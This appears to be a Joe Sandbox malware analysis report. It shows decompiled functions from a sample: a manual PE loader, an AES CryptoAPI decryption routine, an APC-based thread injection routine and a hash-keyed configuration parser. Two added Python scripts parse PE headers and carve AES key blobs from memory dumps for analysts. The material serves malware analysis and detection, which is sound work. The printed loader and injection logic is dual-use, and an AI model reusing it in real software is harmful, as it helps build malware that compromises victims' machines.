          /* 0040134e */			_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40; // IMAGE_NT_HEADERS of the mapped copy
          /* 00401351 */			_t24 = E00401000(_t40, _t44); // executed; import resolution (LoadLibraryA)
          /* 00401356 */			_t29 = _t24;
          /* 0040135a */			if(_t29 == 0) {
          /* 0040135f */				_t26 = E004014CF(_t44, _t40); // executed; section protections (VirtualProtect)
          /* 00401364 */				_t29 = _t26;
          /* 00401368 */				if(_t29 == 0) {
          /* 0040136d */					_push(_t26); // lpReserved = 0
          /* 0040136e */					_push(1); // DLL_PROCESS_ATTACH
          /* 00401372 */					_push(_t40); // hinstDLL = mapped base
          /* 00401377 */					if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) { // base + AddressOfEntryPoint
          /* 0040137f */						_t29 = GetLastError();
          /* 0040137f */					}
          /* 00401377 */				}
          /* 00401368 */			}
          /* 0040135a */		}
          /* 00401381 */		_t42 = _v12;
          /* 0040138a */		 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42)); // two calls through the resolved table
          /* 0040138e */		E00401BA9(_t42); // free the table
          /* 00401398 */		L8:
          /* 0040139e */		return _t29;
          /* 0040139e */	}
          			}

          APIs
            • Part of subcall function 00401202: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00401337,?,?,?,?,?,00000002,?,?), ref: 00401226
            • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 00401248
            • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 0040125E
            • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 00401274
            • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 0040128A
            • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 004012A0
            • Part of subcall function 00401000: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 00401038
            • Part of subcall function 004014CF: VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,?), ref: 00401508
            • Part of subcall function 004014CF: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 0040157D
            • Part of subcall function 004014CF: GetLastError.KERNEL32 ref: 00401583
          • GetLastError.KERNEL32(?,?), ref: 00401379
          Memory Dump Source
          • Source File: 00000000.00000002.580483251.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.580483251.0000000000403000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.580483251.0000000000405000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.580483251.0000000000407000.00000040.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_server_(3).jbxd
          Similarity
          • API ID: AddressProc$ErrorLastProtectVirtual$HandleLibraryLoadModule
          • String ID:
          • API String ID: 3135819546-0
          • Opcode ID: 336f5482e3aed059344eafb9dfd841dc67045812ccfd429b7a3489f36f6440d7
          • Instruction ID: 9c7335bcc5d41c3ee7976e84fb0b4f56712358cbe666051dfec51b4dde3629c0
          • Opcode Fuzzy Hash: 336f5482e3aed059344eafb9dfd841dc67045812ccfd429b7a3489f36f6440d7
          • Instruction Fuzzy Hash: 8B11E976600301ABD711ABA68C85DAB77BCAF98318704017EFD01B7A91EA74ED068798
          Uniqueness

          Uniqueness Score: -1.00%
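          The offsets E004012FB hard-codes (0x3c for e_lfanew, NT+0x28 for AddressOfEntryPoint, NT+0x50 for SizeOfImage) are the same fields an analyst needs when carving the embedded image out of this stage to see where the next stage's entry point lands. The Python below is an added example written for this report, not code from the sample or from Joe Sandbox: it reads those fields from a PE32 image held in memory, applies the loader's (size + k) & ~k rounding, and walks the section table, mapping section flags to the PAGE_* value a VirtualProtect pass would use. The flag-to-protection table and the two-section image that build_sample_pe() constructs are assumptions for the demo; the page does not show E004014CF's own mapping.

```python
"""Read the IMAGE_NT_HEADERS fields a manual PE mapper such as E004012FB
consults, from a PE32 image held in memory, and walk its section table.
Added example; build_sample_pe() constructs a demo image, not the analysed binary."""
import struct

IMAGE_DOS_SIGNATURE = 0x5A4D      # "MZ"
IMAGE_NT_SIGNATURE = 0x00004550   # "PE\0\0"
IMAGE_FILE_MACHINE_I386 = 0x14C
PE32_MAGIC = 0x10B
IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE = 0x20000000, 0x40000000, 0x80000000
# PAGE_* constants as handed to VirtualProtect.
PAGE_NOACCESS, PAGE_READONLY, PAGE_READWRITE = 0x01, 0x02, 0x04
PAGE_EXECUTE, PAGE_EXECUTE_READ, PAGE_EXECUTE_READWRITE = 0x10, 0x20, 0x40


def nt_header_offset(img: bytes) -> int:
    """e_lfanew (the dword at 0x3c), after checking the MZ and PE signatures."""
    if len(img) < 0x40 or struct.unpack_from("<H", img, 0)[0] != IMAGE_DOS_SIGNATURE:
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", img, 0x3C)[0]
    if e_lfanew + 0x18 > len(img) or struct.unpack_from("<I", img, e_lfanew)[0] != IMAGE_NT_SIGNATURE:
        raise ValueError("bad e_lfanew or missing PE signature")
    return e_lfanew


def align_up(value: int, alignment: int) -> int:
    """The (size + k) & ~k rounding the loader applies to SizeOfImage, k = alignment - 1."""
    k = alignment - 1
    return (value + k) & ~k


def page_protection(characteristics: int) -> int:
    """Conventional section-flag to PAGE_* mapping used by manual mappers
    (an assumption for E004014CF, whose own table is not shown on this page)."""
    x = bool(characteristics & IMAGE_SCN_MEM_EXECUTE)
    r = bool(characteristics & IMAGE_SCN_MEM_READ)
    w = bool(characteristics & IMAGE_SCN_MEM_WRITE)
    if x:
        return PAGE_EXECUTE_READWRITE if w else (PAGE_EXECUTE_READ if r else PAGE_EXECUTE)
    if w:
        return PAGE_READWRITE
    return PAGE_READONLY if r else PAGE_NOACCESS


def loader_view(img: bytes) -> dict:
    """The fields E004012FB reads, plus the section table it would map and protect."""
    nt = nt_header_offset(img)
    machine, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", img, nt + 4)
    if machine != IMAGE_FILE_MACHINE_I386 or struct.unpack_from("<H", img, nt + 0x18)[0] != PE32_MAGIC:
        raise ValueError("only 32-bit PE32 images are handled here")
    entry_rva = struct.unpack_from("<I", img, nt + 0x28)[0]      # OptionalHeader.AddressOfEntryPoint
    image_base = struct.unpack_from("<I", img, nt + 0x34)[0]     # OptionalHeader.ImageBase
    section_align = struct.unpack_from("<I", img, nt + 0x38)[0]  # OptionalHeader.SectionAlignment
    size_of_image = struct.unpack_from("<I", img, nt + 0x50)[0]  # OptionalHeader.SizeOfImage
    sections = []
    table = nt + 0x18 + opt_size                                 # first IMAGE_SECTION_HEADER
    for i in range(nsections):
        name, vsize, va, rawsize, rawptr, _, _, _, _, chars = struct.unpack_from("<8sIIIIIIHHI", img, table + 40 * i)
        if rawptr + rawsize > len(img):
            raise ValueError("section %r points outside the image" % name)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"), "va": va, "vsize": vsize,
                         "raw": rawptr, "rawsize": rawsize, "protect": page_protection(chars)})
    return {"e_lfanew": nt, "entry_rva": entry_rva, "entry_va": image_base + entry_rva,
            "size_of_image": size_of_image, "mapped_size": align_up(size_of_image, section_align),
            "sections": sections}


def build_sample_pe() -> bytes:
    """Constructed two-section PE32 image (headers only, no real code) for the demo."""
    img = bytearray(0x600)
    struct.pack_into("<H", img, 0, IMAGE_DOS_SIGNATURE)
    struct.pack_into("<I", img, 0x3C, 0x80)                   # e_lfanew
    nt = 0x80
    struct.pack_into("<I", img, nt, IMAGE_NT_SIGNATURE)
    struct.pack_into("<HHIIIHH", img, nt + 4, IMAGE_FILE_MACHINE_I386, 2, 0, 0, 0, 0xE0, 0x2102)
    opt = nt + 0x18
    struct.pack_into("<H", img, opt, PE32_MAGIC)
    struct.pack_into("<I", img, opt + 0x10, 0x1000)           # AddressOfEntryPoint
    struct.pack_into("<I", img, opt + 0x1C, 0x400000)         # ImageBase
    struct.pack_into("<I", img, opt + 0x20, 0x1000)           # SectionAlignment
    struct.pack_into("<I", img, opt + 0x24, 0x200)            # FileAlignment
    struct.pack_into("<I", img, opt + 0x38, 0x2FF0)           # SizeOfImage, deliberately not page-aligned
    struct.pack_into("<I", img, opt + 0x3C, 0x200)            # SizeOfHeaders
    struct.pack_into("<I", img, opt + 0x5C, 16)               # NumberOfRvaAndSizes
    sec = opt + 0xE0
    struct.pack_into("<8sIIIIIIHHI", img, sec, b".text", 0x100, 0x1000, 0x200, 0x200, 0, 0, 0, 0,
                     IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | 0x20)
    struct.pack_into("<8sIIIIIIHHI", img, sec + 40, b".data", 0x10, 0x2000, 0x200, 0x400, 0, 0, 0, 0,
                     IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE | 0x40)
    return bytes(img)


if __name__ == "__main__":
    view = loader_view(build_sample_pe())
    print("entry VA 0x%x, mapped size 0x%x" % (view["entry_va"], view["mapped_size"]))
    for s in view["sections"]:
        print("%-8s va=0x%04x raw=0x%04x protect=0x%02x" % (s["name"], s["va"], s["raw"], s["protect"]))
```

          Run it against a region dumped at the moment E004012FB is entered (the image pointer is in eax) and compare entry_va with the address the stage jumps to; a SizeOfImage that is not a multiple of SectionAlignment is the case the loader's rounding exists for.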

          C-Code - Quality: 75%
          			// Takes a buffer (_a4) and its length, runs it through E005E1508 (the CryptoAPI
          			// routine in the API list below: a PROV_RSA_AES context opened with
          			// CRYPT_VERIFYCONTEXT, a 0x1c-byte key blob imported with CryptImportKey and an IV
          			// set with CryptSetKeyParam(KP_IV = 1)), then allocates a buffer twice the input
          			// length from the module heap, lets E005E22EA fill it from the input and frees the
          			// input. Returns the new buffer, or 0 on failure. The lstrlen argument as printed
          			// is a decompiler artefact; the call is the one recorded at 005E5074 below.
          			E005E5063(void* __ecx, void* __edx, void* _a4, void* _a8) {
          				void* _t13;
          				void* _t21;
          
          /* 005e506b */	_t11 =  &_a4;
          /* 005e5072 */	_t21 = 0;
          /* 005e5074 */	__imp__( &_a8); // lstrlen
          /* 005e5083 */	_t13 = E005E1508( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
          /* 005e508a */	if(_t13 == 0) {
          /* 005e5099 */		_t21 = E005E33DC(_a8 + _a8); // RtlAllocateHeap, twice the input length
          /* 005e509d */		if(_t21 != 0) {
          /* 005e50a4 */			E005E22EA(_a4, _t21, _t23);
          /* 005e50a4 */		}
          /* 005e50ac */		E005E61DA(_a4); // RtlFreeHeap
          /* 005e50b1 */	}
          /* 005e50b6 */	return _t21;
          			}

          APIs
          • lstrlen.KERNEL32(00000000,00000000,005E3ECE,00000000,?,005E66D9,00000000,005E3ECE,?,775EC740,005E3ECE,00000000,02BC9600), ref: 005E5074
            • Part of subcall function 005E1508: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,005E5088,00000001,005E3ECE,00000000), ref: 005E1540
            • Part of subcall function 005E1508: memcpy.NTDLL(005E5088,005E3ECE,00000010,?,?,?,005E5088,00000001,005E3ECE,00000000,?,005E66D9,00000000,005E3ECE,?,775EC740), ref: 005E1559
            • Part of subcall function 005E1508: CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 005E1582
            • Part of subcall function 005E1508: CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 005E159A
            • Part of subcall function 005E1508: memcpy.NTDLL(00000000,775EC740,02BC9600,00000010), ref: 005E15EC
            • Part of subcall function 005E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,005E62F6), ref: 005E33E8
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
          • String ID:
          • API String ID: 894908221-0
          • Opcode ID: 5d47086869c23f055078d83bebdf914513b348135a1068be73ac04a0f19d1f1f
          • Instruction ID: a7f967d4b6f3a3207da6604cf006dcb9652fd8550e9ff3f83d375bbb9d9b4d15
          • Opcode Fuzzy Hash: 5d47086869c23f055078d83bebdf914513b348135a1068be73ac04a0f19d1f1f
          • Instruction Fuzzy Hash: 58F05E76100549BBCF16AF56DC48CDA3FADFFC83A5B008022FD49CA111DA71DA55DBA0
          Uniqueness

          Uniqueness Score: -1.00%
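          A CryptImportKey with dwDataLen 0x1c on a PROV_RSA_AES context, followed by CryptSetKeyParam(KP_IV), pins down the key material format: a PLAINTEXTKEYBLOB is an 8-byte BLOBHEADER, a DWORD key length and the raw key, so 0x1c bytes is exactly a 16-byte AES-128 key. The Python below is an added example, not code from the sample or the report: it builds and validates that blob layout and carves such blobs out of a memory buffer, which is how the key behind the pbData argument can be recovered from a dump taken at the call. The key bytes and the buffer it scans are constructed for the demo.

```python
"""Build, parse and carve the CryptoAPI PLAINTEXTKEYBLOB implied by a 0x1c-byte
CryptImportKey call on a PROV_RSA_AES context: an 8-byte BLOBHEADER, a DWORD key
length and the raw key, which for 0x1c bytes means a 16-byte AES-128 key.
Added example; the key and the memory buffer below are constructed for the demo."""
import struct

PLAINTEXTKEYBLOB = 0x8
CUR_BLOB_VERSION = 0x2
CALG_AES_128, CALG_AES_192, CALG_AES_256 = 0x660E, 0x660F, 0x6610
CALG_BY_KEYLEN = {16: CALG_AES_128, 24: CALG_AES_192, 32: CALG_AES_256}
KEYLEN_BY_CALG = {v: k for k, v in CALG_BY_KEYLEN.items()}
CALG_NAME = {CALG_AES_128: "AES-128", CALG_AES_192: "AES-192", CALG_AES_256: "AES-256"}
# Values recorded for the calls inside E005E1508 above.
PROV_RSA_AES = 0x18
CRYPT_VERIFYCONTEXT = 0xF0000000   # ephemeral context, no key container on disk
KP_IV = 0x1                        # CryptSetKeyParam(hKey, KP_IV, iv, 0)
BLOBHEADER = struct.Struct("<BBHI")  # bType, bVersion, reserved, aiKeyAlg


def build_plaintext_key_blob(key: bytes) -> bytes:
    """Lay out BLOBHEADER + DWORD cbKey + key, as CryptImportKey expects."""
    if len(key) not in CALG_BY_KEYLEN:
        raise ValueError("AES keys are 16, 24 or 32 bytes")
    header = BLOBHEADER.pack(PLAINTEXTKEYBLOB, CUR_BLOB_VERSION, 0, CALG_BY_KEYLEN[len(key)])
    return header + struct.pack("<I", len(key)) + key


def parse_plaintext_key_blob(blob: bytes) -> dict:
    """Validate a blob and return the algorithm name and key bytes."""
    if len(blob) < BLOBHEADER.size + 4:
        raise ValueError("shorter than BLOBHEADER + key length")
    btype, version, reserved, alg = BLOBHEADER.unpack_from(blob, 0)
    if btype != PLAINTEXTKEYBLOB or version != CUR_BLOB_VERSION or reserved != 0:
        raise ValueError("not a PLAINTEXTKEYBLOB")
    if alg not in CALG_NAME:
        raise ValueError("unexpected ALG_ID 0x%x" % alg)
    keylen = struct.unpack_from("<I", blob, BLOBHEADER.size)[0]
    if keylen != KEYLEN_BY_CALG[alg] or len(blob) != BLOBHEADER.size + 4 + keylen:
        raise ValueError("key length does not match the ALG_ID or the blob size")
    return {"alg": CALG_NAME[alg], "key": blob[BLOBHEADER.size + 4:]}


def expected_blob_size(key_bits: int) -> int:
    """0x1c for AES-128: the dwDataLen seen in the CryptImportKey call above."""
    return BLOBHEADER.size + 4 + key_bits // 8


def carve_plaintext_key_blobs(buf: bytes) -> list:
    """Scan a memory buffer for well-formed AES PLAINTEXTKEYBLOBs, e.g. around the
    pbData argument at the moment CryptImportKey is called. Returns (offset, parsed)."""
    hits = []
    for alg, keylen in KEYLEN_BY_CALG.items():
        needle = BLOBHEADER.pack(PLAINTEXTKEYBLOB, CUR_BLOB_VERSION, 0, alg) + struct.pack("<I", keylen)
        pos = buf.find(needle)
        while pos != -1:
            blob = buf[pos:pos + len(needle) + keylen]
            if len(blob) == len(needle) + keylen:      # skip a header truncated at the buffer end
                hits.append((pos, parse_plaintext_key_blob(blob)))
            pos = buf.find(needle, pos + 1)
    return hits


def demo_memory() -> bytes:
    """Constructed buffer: filler, one AES-128 blob, more filler (not a dump of the sample)."""
    key = bytes(range(0x10, 0x20))
    return b"\x90" * 37 + build_plaintext_key_blob(key) + b"\xcc" * 11


if __name__ == "__main__":
    for offset, parsed in carve_plaintext_key_blobs(demo_memory()):
        print("0x%04x %s key=%s" % (offset, parsed["alg"], parsed["key"].hex()))
```

          The 12-byte needle (08 02 00 00 0E 66 00 00 10 00 00 00 for AES-128) is also usable as-is in a memory scanner or a Yara hex string; the IV for the KP_IV call is not part of the blob and has to be taken from the CryptSetKeyParam argument separately.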

          APIs
            • Part of subcall function 005C1FCF: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,005C1C63), ref: 005C1FDE
            • Part of subcall function 005C1FCF: GetVersion.KERNEL32(?,005C1C63), ref: 005C1FED
            • Part of subcall function 005C1FCF: GetCurrentProcessId.KERNEL32(?,005C1C63), ref: 005C2009
            • Part of subcall function 005C1FCF: OpenProcess.KERNEL32(0010047A,00000000,00000000,?,005C1C63), ref: 005C2022
            • Part of subcall function 005C154D: RtlAllocateHeap.NTDLL(00000000,?,005C1477), ref: 005C1559
          • NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 005C1C8D
          • Sleep.KERNEL32(00000000,00000030), ref: 005C1CD4
          • GetLocaleInfoA.KERNEL32(00000400,0000005A,?,00000004), ref: 005C1CFC
          • GetSystemDefaultUILanguage.KERNEL32 ref: 005C1D06
          • VerLanguageNameA.KERNEL32(?,?,00000004), ref: 005C1D19
          • CreateThread.KERNEL32(00000000,00000000,00000000,00000000), ref: 005C1D8E
          • QueueUserAPC.KERNEL32(0040139F,00000000,?), ref: 005C1DA4
          • GetLastError.KERNEL32 ref: 005C1DB4
          • TerminateThread.KERNEL32(00000000,00000000), ref: 005C1DBE
          • SetLastError.KERNEL32(00000000), ref: 005C1DCA
          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 005C1DD7
          • GetExitCodeThread.KERNEL32(00000000,00000000), ref: 005C1DE9
          • GetLastError.KERNEL32 ref: 005C1DF4
          • GetLastError.KERNEL32 ref: 005C1E05
          Memory Dump Source
          • Source File: 00000000.00000002.580647391.00000000005C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5c0000_server_(3).jbxd
          Yara matches
          Similarity
          • API ID: ErrorLast$Thread$CreateLanguageProcessSystem$AllocateCodeCurrentDefaultEventExitHeapInfoInformationLocaleNameObjectOpenQueryQueueSingleSleepTerminateUserVersionWait
          • String ID:
          • API String ID: 1666582358-0
          • Opcode ID: 2f7a3bb356b8b54c1b3c7e8ff32702db1cbd6d7b6564eab963341c519062ef97
          • Instruction ID: 9ad130e6b30d11179cc4a112adfdaee10a9e808b5d4e524764cc23cff6c52efa
          • Opcode Fuzzy Hash: 2f7a3bb356b8b54c1b3c7e8ff32702db1cbd6d7b6564eab963341c519062ef97
          • Instruction Fuzzy Hash: B5519E75901A15AFE720EFF59D48EAFBE7CBB86751B104029F902E2152D730CE409BA8
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 93%
          			// Configuration parser. E005E10F8 fetches a data item by hash (pointer in the first
          			// out-parameter, size in the second); E005E36C5 returns the string value of a named
          			// field of the text configuration _t102. Every hash handed to them is an immediate
          			// XORed with the seed at 0x5ea344 (0x43175ac3 in this run), so the immediates vary
          			// per build while the XORed values are the stable field identifiers. Numeric fields
          			// are converted with StrToIntExA (SHLWAPI) into globals, the one at immediate
          			// 0x02ddbcae defaulting to 5 when absent or zero; the field at 0x0cbf33fd is passed
          			// with 0x10 to E005E5B85 and its result to E005E607C; the field at 0x93710135 feeds
          			// E005E5364 on the structure at *0x5ea3cc; the last two fields default to module
          			// strings whose first bytes read "/ima" (0x616d692f) and ".avi" (0x6976612e).
          			// Returns 2 (ERROR_FILE_NOT_FOUND) when the second item is missing, 0 on success;
          			// the items are released to the private heap at *0x5ea2d8.
          			E005E1D8A(void* __ebx, int* __ecx, void* __edx, void* __edi, void* __esi) {
          				int _v8;
          				void* _v12;
          				void* _v16;
          				signed int _t28;
          				signed int _t33;
          				signed int _t39;
          				char* _t45;
          				char* _t46;
          				char* _t47;
          				char* _t48;
          				char* _t49;
          				char* _t50;
          				void* _t51;
          				void* _t52;
          				void* _t53;
          				intOrPtr _t54;
          				void* _t56;
          				intOrPtr _t57;
          				intOrPtr _t58;
          				signed int _t61;
          				intOrPtr _t64;
          				signed int _t65;
          				signed int _t70;
          				void* _t72;
          				void* _t73;
          				signed int _t75;
          				signed int _t78;
          				signed int _t82;
          				signed int _t86;
          				signed int _t90;
          				signed int _t94;
          				signed int _t98;
          				void* _t101;
          				void* _t102;
          				void* _t116;
          				void* _t119;
          				intOrPtr _t122;
          
          /* 005e1d8a */	_t119 = __esi;
          /* 005e1d8a */	_t116 = __edi;
          /* 005e1d8a */	_t104 = __ecx;
          /* 005e1d8a */	_t101 = __ebx;
          /* 005e1d8d */	_t28 =  *0x5ea344; // 0x43175ac3, hash seed
          /* 005e1daa */	if(E005E10F8( &_v8,  &_v12, _t28 ^ 0xa23f04a7) != 0 && _v12 >= 0x110) {
          /* 005e1db8 */		 *0x5ea374 = _v8;
          /* 005e1db8 */	}
          /* 005e1dbd */	_t33 =  *0x5ea344; // 0x43175ac3
          /* 005e1dd7 */	if(E005E10F8( &_v16,  &_v12, _t33 ^ 0x2bfce340) == 0) {
          /* 005e2045 */		_v12 = 2; // ERROR_FILE_NOT_FOUND
          /* 005e204c */		L69:
          /* 005e2050 */		return _v12;
          /* 005e2050 */	}
          /* 005e1ddd */	_t39 =  *0x5ea344; // 0x43175ac3
          /* 005e1de2 */	_push(_t116);
          /* 005e1dfa */	if(E005E10F8( &_v12,  &_v8, _t39 ^ 0xcca68722) == 0) {
          /* 005e2032 */		L67:
          /* 005e203c */		HeapFree( *0x5ea2d8, 0, _v16);
          /* -------- */		goto L69;
          /* 005e1e00 */	} else {
          /* 005e1e00 */		_push(_t101);
          /* 005e1e01 */		_t102 = _v12; // text configuration, freed at 005e2028
          /* 005e1e06 */		if(_t102 == 0) {
          /* 005e1e1c */			_t45 = 0;
          /* 005e1e08 */		} else {
          /* 005e1e08 */			_t98 =  *0x5ea344; // 0x43175ac3
          /* 005e1e15 */			_t45 = E005E36C5(_t104, _t102, _t98 ^ 0x523046bc); // field lookup by seed ^ immediate
          /* 005e1e15 */		}
          /* 005e1e1e */		_push(_t119);
          /* 005e1e27 */		if(_t45 != 0) {
          /* 005e1e29 */			_t104 =  &_v8;
          /* 005e1e33 */			if(StrToIntExA(_t45, 0,  &_v8) != 0) {
          /* 005e1e38 */				 *0x5ea2e0 = _v8;
          /* 005e1e38 */			}
          /* 005e1e33 */		}
          /* 005e1e3f */		if(_t102 == 0) {
          /* 005e1e55 */			_t46 = 0;
          /* 005e1e41 */		} else {
          /* 005e1e41 */			_t94 =  *0x5ea344; // 0x43175ac3
          /* 005e1e4e */			_t46 = E005E36C5(_t104, _t102, _t94 ^ 0x0b3e0d40);
          /* 005e1e4e */		}
          /* 005e1e59 */		if(_t46 != 0) {
          /* 005e1e5b */			_t104 =  &_v8;
          /* 005e1e65 */			if(StrToIntExA(_t46, 0,  &_v8) != 0) {
          /* 005e1e6a */				 *0x5ea2e4 = _v8;
          /* 005e1e6a */			}
          /* 005e1e65 */		}
          /* 005e1e71 */		if(_t102 == 0) {
          /* 005e1e87 */			_t47 = 0;
          /* 005e1e73 */		} else {
          /* 005e1e73 */			_t90 =  *0x5ea344; // 0x43175ac3
          /* 005e1e80 */			_t47 = E005E36C5(_t104, _t102, _t90 ^ 0x1b5903e6);
          /* 005e1e80 */		}
          /* 005e1e8b */		if(_t47 != 0) {
          /* 005e1e8d */			_t104 =  &_v8;
          /* 005e1e97 */			if(StrToIntExA(_t47, 0,  &_v8) != 0) {
          /* 005e1e9c */				 *0x5ea2e8 = _v8;
          /* 005e1e9c */			}
          /* 005e1e97 */		}
          /* 005e1ea3 */		if(_t102 == 0) {
          /* 005e1eb9 */			_t48 = 0;
          /* 005e1ea5 */		} else {
          /* 005e1ea5 */			_t86 =  *0x5ea344; // 0x43175ac3
          /* 005e1eb2 */			_t48 = E005E36C5(_t104, _t102, _t86 ^ 0x267c2349);
          /* 005e1eb2 */		}
          /* 005e1ebd */		if(_t48 != 0) {
          /* 005e1ebf */			_t104 =  &_v8;
          /* 005e1ec9 */			if(StrToIntExA(_t48, 0,  &_v8) != 0) {
          /* 005e1ece */				 *0x5ea004 = _v8;
          /* 005e1ece */			}
          /* 005e1ec9 */		}
          /* 005e1ed5 */		if(_t102 == 0) {
          /* 005e1eeb */			_t49 = 0;
          /* 005e1ed7 */		} else {
          /* 005e1ed7 */			_t82 =  *0x5ea344; // 0x43175ac3
          /* 005e1ee4 */			_t49 = E005E36C5(_t104, _t102, _t82 ^ 0x167db74c);
          /* 005e1ee4 */		}
          /* 005e1eef */		if(_t49 != 0) {
          /* 005e1ef1 */			_t104 =  &_v8;
          /* 005e1efb */			if(StrToIntExA(_t49, 0,  &_v8) != 0) {
          /* 005e1f00 */				 *0x5ea02c = _v8;
          /* 005e1f00 */			}
          /* 005e1efb */		}
          /* 005e1f07 */		if(_t102 == 0) {
          /* 005e1f1d */			_t50 = 0;
          /* 005e1f09 */		} else {
          /* 005e1f09 */			_t78 =  *0x5ea344; // 0x43175ac3
          /* 005e1f16 */			_t50 = E005E36C5(_t104, _t102, _t78 ^ 0x02ddbcae);
          /* 005e1f16 */		}
          /* 005e1f21 */		if(_t50 == 0) {
          /* 005e1f34 */			L41:
          /* 005e1f34 */			 *0x5ea2ec = 5; // default when the field is absent or parses as 0
          /* -------- */			goto L42;
          /* 005e1f23 */		} else {
          /* 005e1f23 */			_t104 =  &_v8;
          /* 005e1f2d */			if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
          /* -------- */				goto L41;
          /* 005e1f3e */			} else {
          /* 005e1f3e */				L42:
          /* 005e1f40 */				if(_t102 == 0) {
          /* 005e1f56 */					_t51 = 0;
          /* 005e1f42 */				} else {
          /* 005e1f42 */					_t75 =  *0x5ea344; // 0x43175ac3
          /* 005e1f4f */					_t51 = E005E36C5(_t104, _t102, _t75 ^ 0x0cbf33fd);
          /* 005e1f4f */				}
          /* 005e1f5a */				if(_t51 != 0) {
          /* 005e1f5c */					_push(_t51);
          /* 005e1f5f */					_t72 = 0x10;
          /* 005e1f60 */					_t73 = E005E5B85(_t72);
          /* 005e1f67 */					if(_t73 != 0) {
          /* 005e1f69 */						_push(_t73);
          /* 005e1f6a */						E005E607C();
          /* 005e1f6a */					}
          /* 005e1f67 */				}
          /* 005e1f71 */				if(_t102 == 0) {
          /* 005e1f87 */					_t52 = 0;
          /* 005e1f73 */				} else {
          /* 005e1f73 */					_t70 =  *0x5ea344; // 0x43175ac3
          /* 005e1f80 */					_t52 = E005E36C5(_t104, _t102, _t70 ^ 0x93710135);
          /* 005e1f80 */				}
          /* 005e1f8b */				if(_t52 != 0 && E005E5B85(0, _t52) != 0) {
          /* 005e1f99 */					_t122 =  *0x5ea3cc; // 0x2bc9600
          /* 005e1fa3 */					E005E5364(_t122 + 4, _t68);
          /* 005e1fa3 */				}
          /* 005e1fab */				if(_t102 == 0) {
          /* 005e1fc1 */					_t53 = 0;
          /* 005e1fad */				} else {
          /* 005e1fad */					_t65 =  *0x5ea344; // 0x43175ac3
          /* 005e1fba */					_t53 = E005E36C5(_t104, _t102, _t65 ^ 0x175474b7);
          /* 005e1fba */				}
          /* 005e1fc5 */				if(_t53 == 0) {
          /* 005e1fd8 */					L59:
          /* 005e1fd8 */					_t54 =  *0x5ea348; // 0x25dd5a8
          /* 005e1fdd */					_t22 = _t54 + 0x5eb5f3; // 0x616d692f, module string starting "/ima"
          /* 005e1fe3 */					 *0x5ea370 = _t22;
          /* -------- */					goto L60;
          /* 005e1fc7 */				} else {
          /* 005e1fca */					_t64 = E005E5B85(0, _t53);
          /* 005e1fcf */					 *0x5ea370 = _t64;
          /* 005e1fd6 */					if(_t64 != 0) {
          /* 005e1fe8 */						L60:
          /* 005e1fea */						if(_t102 == 0) {
          /* 005e2000 */							_t56 = 0;
          /* 005e1fec */						} else {
          /* 005e1fec */							_t61 =  *0x5ea344; // 0x43175ac3
          /* 005e1ff9 */							_t56 = E005E36C5(_t104, _t102, _t61 ^ 0xf8a29dde);
          /* 005e1ff9 */						}
          /* 005e2004 */						if(_t56 == 0) {
          /* 005e2010 */							_t57 =  *0x5ea348; // 0x25dd5a8
          /* 005e2015 */							_t23 = _t57 + 0x5eb899; // 0x6976612e, module string starting ".avi"
          /* 005e2015 */							_t58 = _t23;
          /* 005e2006 */						} else {
          /* 005e2009 */							_t58 = E005E5B85(0, _t56);
          /* 005e2009 */						}
          /* 005e2023 */						 *0x5ea3e0 = _t58;
          /* 005e2028 */						HeapFree( *0x5ea2d8, 0, _t102);
          /* 005e202e */						_v12 = 0;
          /* -------- */						goto L67;
          /* 005e2031 */					}
